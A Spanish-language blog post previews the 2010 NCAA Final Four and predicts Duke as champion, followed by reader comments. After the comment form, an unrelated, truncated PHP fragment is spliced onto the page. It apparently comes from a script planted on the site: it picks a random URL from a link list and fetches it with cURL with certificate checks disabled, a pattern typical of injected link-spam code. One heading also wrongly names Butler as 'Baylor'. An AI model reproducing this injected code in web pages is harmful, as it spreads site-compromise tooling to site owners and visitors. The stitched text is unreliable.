Final Four 2010

02 de April de 2010 por kantonyo

El torneo de la NCAA llega a su desenlace este fin de semana. Después de 61 partidos en menos de 15 días, los cuatro campeones de las divisiones regionales disputarán la Final-Four. La capital del estado de Indiana, famosa por su circuito oval, será la encargada de organizar el evento que se celebrará en el majestuoso Lucas Oil Stadium, con capacidad para 70.000 personas. El estadio de los Colts de Indianápolis (NFL), es conocido por su enorme techo retráctil y por su gran ventanal donde se puede observar desde su interior la ciudad de Indiana.

A continuación resumimos como ha transcurrido el Sweet-Sixteen y como afrontan los equipos clasificados las eliminatorias finales.

Michigan State Spartans – Baylor Bulldogs

Un año más los Spartans de Michigan State han conseguido llegar a la Final Four. Este año parecía imposible después de una temporada muy irregular y más aún cuando fueron encuadrados en la división regional a priori más complicada. Todo fue poniéndose de cara gracias a sus victorias sobre la bocina contra New Mexico State y Maryland, y sobre todo con la prematura eliminación de Kansas (#1) ante Northern Iowa.

En las semifinales regionales, los Spartans consiguieron vencer a los Panthers de Northern Iowa con la ausencia de Kalin Lucas, lesionado para lo que queda de campeonato. Durrell Summers asumió los mandos del equipo con una gran actuación anotando 19 puntos y capturando 7 rebotes.

En la final de la Midwest Regional, se enfrentaron a Tennessee Volunteers que venían de eliminar a los otros favoritos del cuadro, Ohio State (#2). El encuentro se decidió en los últimos segundos gracias a una inocente falta contra Raymar Morgan, el cual se encargó de anotar. El escolta Durrell Summers fue de nuevo el jugador más destacado con 21 puntos (8/10). Wayne Chism, pívot de Tennessee, que venía de hacer una gran actuación contra Ohio State con 22 puntos y 11 rebotes, estuvo decepcionante anotando sólo 13 puntos y 3 rebotes.

La gran sorpresa de este año, ha sido sin duda los Bulldogs de Butler. Al igual que el año pasado ocurriera con Michigan State, los Bulldogs serán anfitriones en la Final Four de este año, ya que la Universidad de Butler se encuentra en Indianápolis. Los Bulldogs pertenecen a la modesta Horizon League, donde llevan cuatro años consecutivos ganando la Regular Season y que les ha permitido llegar al torneo final de este año con un balance de 18-0.

Su camino no ha sido nada fácil, en semifinales de la West Regional, consiguieron deshacerse de Syracuse (#1). Los Bulldogs aguantaron la remontada de los Orange después de haberse ido al descanso con 10 puntos de ventaja. Gordon Hayward, alero de Butler fue el gran protagonista con 17 puntos y estuvo muy bien arropado por un inteligente y activo Shelvin Mack. La buena defensa exterior provocó 18 pérdidas de balón en Syracuse. Wes Johnson, figura de los Orange, se quedó en 17 puntos y 9 rebotes.

Su último escollo para llegar a la Final Four fue Kansas State (#2). De nuevo un gran inicio de los Bulldogs condicionó el transcurso del encuentro siempre con los Wildcats a remolque. Denis Clemente y Jacob Pullen, pareja exterior de Kansas State y que tan bien lo habían hecho este torneo estuvieron esta vez desafortunados en ataque y su gran defensa, que provocó 20 pérdidas de balón en Butler, quedó en nada. Los mejores en los Bulldogs volvieron a ser Gordon Hayward (22 puntos) y Shelvin Mack (16 puntos).

Pronóstico: Michigan State ha llegado a Indianápolis con bastante fortuna, llevándose muchos partidos en los últimos instantes y favoreciéndose de las eliminaciones de Kansas y Ohio State a manos de otros. Además se ha quedado por lesión sin su máximo exponente, el base Kalin Lucas. En frente tendrá al equipo anfitrión, que tiene su sede a pocos kilómetros del Lucas Oil Stadium. Su entrenador, Brad Stevens de sólo 33 años, ha conseguido que los Bulldogs jueguen muy concentrados y con un ritmo de juego muy constante que les ha permitido sorprender a equipos como Syracuse o Kansas State. Gordon Hayward, llega a este partido en un gran estado de forma y el base Shelvin Mack ha sido una de los descubrimientos del torneo. Shelvin, que ha demostrado mucho oficio, podría ser la clave en el pase de Butler a la final. Finalista: Butler.

West Virginia Mountaineers – Duke Blue Devils


Los Montañeros de West Virginia han conseguido clasificarse para la Final Four por primera vez desde 1958 eliminando al equipo de moda de esta temporada, los Wildcats de Kentucky. Justo premio para una universidad que había conseguido estar entre los 16 mejores en cuatro de los últimos seis años. Una vez más, el trío de aleros formado por Butler, Ebanks y Jones fue fundamental en la victoria de los Mountaineers, aunque esta vez también contaron con la estimable ayuda del base senior, Joe Mazzulla, que se fue hasta los 17 puntos.

El experimento de Bob Huggins de jugar con cuatro aleros y un base funcionó a la perfección. La gran defensa en el perímetro con jugadores altos fue clave en la gran cantidad de triples fallados por Kentucky, con 4 aciertos de 32 lanzamientos (12%). Y a pesar del dominio debajo de los tableros, con 45 rebotes frente a los 34 de West Virginia, los pívots DeMarcus Cousins y Patrick Patterson acabaron desquiciados ante la versatilidad de sus emparejamientos, que jugaban tanto dentro como fuera de la zona. El máximo aspirante a número 1 del draft, John Wall, no fue fiel a su estilo y estuvo muy precipitado y fallón durante todo el encuentro.

La Universidad de Duke ha sido por lo tanto el único nº1 que ha conseguido llegar hasta Indianápolis. Para ello tuvieron que vencer en un disputadísimo encuentro a los Bears de Baylor a pesar de la mala actuación de su estrella, Kyle Singler. El rubio alero no consiguió encestar ninguna canasta en diez intentos en los 34 minutos que disputó, además de perder 4 balones. La potente defensa interior de Baylor, con Ekpe Udoh (18 ptos, 10 reb) al mando, fue un muro como ya demostró contra Saint Mary’s en semifinales, donde consiguió dejar a Omar Samhan en sólo 15 puntos (7/17).

En cambio, la pareja de guards, Jon Scheyer (20 ptos) y Nolan Smith (29 ptos), acabaron con cualquier esperanza de Baylor de llegar a la Final Four, gracias a su acierto en la línea de tres puntos en los momentos decisivos.

Pronóstico: En la segunda eliminatoria que se disputa el sábado, se enfrentan dos formas antagónicas de ver el baloncesto. Un equipo de corte clásico como Duke, con los roles bien diferenciados contra una plantilla como la de West Virginia con jugadores físicamente muy potente y versátiles. West Virginia ya demostró contra Kentucky que puede vencer a este tipo de equipos y además Duke es incluso más frágil físicamente que UK. Mike Krzyzewski (Coach K), entrenador de Duke, tendrá la responsabilidad de encontrar la forma de parar a los Mountaineers y no dudamos de que pueda conseguirlo ya que está considerado uno de los mejores entrenadores defensivos de este deporte. Kyle Singler deberá encontrarse más cómodo ofensivamente contra WV que contra Baylor y puede convertirse en la clave del partido. Finalista: Duke

Final: Butler – Duke: Si conseguimos acertar con la final, Duke es claro favorito al título. Posiblemente la semifinal WV-Duke es una final anticipada, ya que son los dos equipos más fuertes, pero en un torneo como el de este año con tantas sorpresas puede ocurrir cualquier cosa. Campeón: Duke Blue Devils.

Comenta

7 comentarios a esta entrada

  1. Dantley2 dice:
    #1

    Grande esta previa ¡¡¡¡

    Lástima que no he podido ver casi nada, aunque a ratos veo los diferidos. Vaya tela, no conozco a ninguno, sólo he seguido un poquito a SIngler.

    Aún me sigue pareciendo increíble que Kentucky se quedara fuera, pero eso es baloncesto

      Citar

  2. kantonyo dice:
    #2

    La Final Four ha quedado un poco descafeinada por las eliminaciones de Kansas, Kentucky y Syracuse entre otros, pero va a estar igual de emocionante. Tambien nos hemos quedado sin los primeros puestos del draft: Wall, Turner, Johnson, Cousins, Aldrich, Monroe etc…

      Citar

  3. Dantley2 dice:
    #3

    He visto un rato del partido de Butler. No los había visto hasta ahora. Guerreros a más no poder, pero vaya paliza de partido. En cualquier caso es impresionante verlos y ver la pasión en la grada por algo que se veía imposible

      Citar

  4. RusticoColorao dice:
    #4

    Yo he visto la primera semifinal y parte de la segunda.

    Dantley2, los partidos de NCAA no suelen ser muy vistosos, aunque a mi me gustó el partido de Butler, será porque son la cenicienta. Me gustaron Hayward y Mack y sobre todo su defensa. Michigan State con Lucas lesionado son bastante menos equipos. Aún así los Spartans son lo que su nombre indica.

    Parece que el rival de mis Tar Heels se llevará esta noche el torneo… pero apuesto (o es lo que deseo) por una sorpresa de los Bulldogs de Butlet. Mítico ese perro en mitad de la pista.

      Citar

  5. sergi237 dice:
    #5

      Citar

  6. RusticoColorao dice:
    #6

    Pues acabo de verlo en diferido… una pena. No saltó la sorpresa y Duke (merecidamente en mi opinión) se llevó el torneo.

      Citar

  7. Dantley2 dice:
    #7

    Ví también casi todo en diferido y precioso el ambiente e intensísimo el partido. La verdad es que habiendo llegado aquí, sólo les faltó la última para haber hecho más historia de la que han hecho, muy bonito lo de Butler

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>